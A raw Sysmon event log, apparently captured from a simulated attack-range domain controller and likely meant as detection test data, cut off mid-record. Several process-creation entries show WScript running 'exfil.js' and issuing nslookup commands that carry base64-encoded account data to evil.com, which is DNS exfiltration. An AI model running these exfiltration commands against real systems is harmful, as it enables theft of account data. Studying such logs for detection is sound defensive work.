10341000x8000000000000000203941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.178{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-DD41-000000005F02}8128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.178{2E1864BB-17CC-629A-DD41-000000005F02}81284796C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-DC41-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.162{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-DD41-000000005F02}8128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.162{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-DC41-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.162{2E1864BB-17A1-629A-783D-000000005F02}55521300C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-DC41-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.166{2E1864BB-17CC-629A-DC41-000000005F02}5064C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkpjqb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.161{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcmijv.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.140{2E1864BB-17CC-629A-DA41-000000005F02}78562788C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-DB41-000000005F02}7700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.124{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.124{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.124{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.124{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.124{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-DB41-000000005F02}7700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.124{2E1864BB-17CC-629A-D941-000000005F02}11443536C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-DB41-000000005F02}7700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.137{2E1864BB-17CC-629A-DB41-000000005F02}7700C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-D941-000000005F02}1144C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcmijv.tmp 2>&1 10341000x8000000000000000203922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.093{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-DA41-000000005F02}7856C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.093{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-DA41-000000005F02}7856C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.093{2E1864BB-17CC-629A-DA41-000000005F02}78562788C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-D941-000000005F02}1144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.078{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-DA41-000000005F02}7856C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.078{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-D941-000000005F02}1144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.078{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.078{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.078{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.078{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.078{2E1864BB-17A1-629A-783D-000000005F02}55527380C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-D941-000000005F02}1144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.079{2E1864BB-17CC-629A-D941-000000005F02}1144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcmijv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.062{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwmkij.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.040{2E1864BB-17CC-629A-D741-000000005F02}13445604C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-D841-000000005F02}7060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 